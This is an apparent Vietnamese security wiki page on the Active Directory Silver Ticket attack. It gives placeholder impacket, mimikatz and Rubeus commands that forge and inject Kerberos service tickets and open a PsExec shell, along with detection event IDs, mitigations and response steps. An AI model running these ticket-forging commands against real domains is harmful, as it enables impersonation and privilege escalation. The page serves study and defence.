Silver Ticket

Silver ticket

Silver Ticket attack liên quan đến việc khai thác service ticket trong AD. Phương pháp này dựa vào việc lấy được NTLM hash của một service account, như computer account, để giả mạo một TGS ticket. Với vé giả mạo, attacker có thể truy cập những dịch vụ trên mạng, mạo danh bất kỳ người dùng nào, thường nhằm mục đích giành đặc quyền quản trị. Việc sử dụng khóa AES để giả mạo sẽ an toàn và ít bị phát hiện hơn

Để tạo vé:

On Linux

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache 
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

On Windows

//# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

Dịch vụ CIFS được đánh dấu là mục tiêu chung để truy cập hệ thống tệp của nạn nhân, nhưng các dịch vụ khác như HOST và RPCSS có thể được khai thác để thực hiện các tác vụ và truy vấn VMI

Available Services

Service Type
Service Silver Tickets

WMI

HOST

RPCSS

PowerShell Remoting

HOST

HTTP

Tùy vào hệ điều hành:

WSMAN

RPCSS

WinRM

HOST

HTTP

Một số trường hợp có thể yêu cầu WINRM

Scheduled Tasks

HOST

Windows File Share, also psexec

CIFS

LDAP operations, included DCSync

LDAP

Windows Remote Server Administration Tools

RPCSS

LDAP

CIFS

Golden Tickets

krbtgt

Sử dụng Rubeus có thể yêu cầu tất cả các vé này bằng cách sử dụng tham số:

  • /altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Silverr tickets Event IDs

  • 4624: Account Logon

  • 4634: Account Logoff

  • 4672: Admin Logon

Detect, Mitigate and Respond

DETECT

Quy trình thông thường để có được TGS ticket bao gồm việc yêu cầu DC tạo một vé. Sau khi người gọi chứng minh danh tính, DC sẻ trả lời bằng TGS được mã hóa bằng mật khẩu service account. Bởi vì kẻ thù đã xâm phạm mật khẩu đó nên chúng có thể tạo ra các TGS ticket mà không cần liên lạc với DC

Việc phát hiện Silver Ticket chỉ có thể thực hiện được trên endpoint và liên quan đến việc kiểm tra TGS ticket để tìm các dấu hiệu thao túng tinh vi như:

  • Tên người dùng không tồn tại

  • Thành viên nhóm bị điều chỉnh

  • Username và ID không khớp

  • Yếu hơn các loại mã hóa thông thường hoặc thời gian tồn tại cẩu vé vượt quá mức tối đa của miền (mặc định của miền là 10h, minikatz là 10 năm)

Event

Source

Information

Audit Group Membership: Event ID 4627

Member Computers

  • User’s security identifier (SID)

  • Group memberships

Audit Logon: Event ID 4624

Member Computers

  • User’s security identifier (SID)

  • Username

  • Source IP (indicating potentially compromised host)

MITIGATE

  • Ap dụng các biện pháp quản lý mật khẩu mạnh cho service account.

  • Enable PAC Validation.

  • Xóa bỏ đặc quền quản trị của người dùng cuối trên các máy trạm thành viên, và áp dụng các biện pháp kiểm soát leo thang đặc quyền

  • Giảm thiểu quyền truy cập quản trị vào máy trạm và máy chủ của thành viên xuống mức ít cần thiết nhất

  • Sử dụng các giải pháp như Microsoft LAPS để tạo mật khẩu mạnh, ngẫu nhiên và duy nhất cho tài khoản quản trị viên cục bộ và tự động thay đổi mật khẩu theo định kỳ.

  • Áp dụng các biện pháp giảm thiểu được khuyến nghị cho Kerberoasting .

  • Không cho phép người dùng sở hữu các đặc quyền quản trị qua ranh giới bảo mật.

RESPOND

  • Kích hoạt quy trình ứng phó sự cố và cảnh báo nhóm ứng phó sự cố

  • Cách ly mọi máy tính có liên quan đến điều tra pháp y, xóa bỏ và phục hồi

  • Đặt lại mật khẩu của tài khoản dịch vụ bị xâm phạm

References

LogoSilver TicketHackTricks
LogoSilver Ticket AttackNetwrix
PreviousDemoNextDemo

Last updated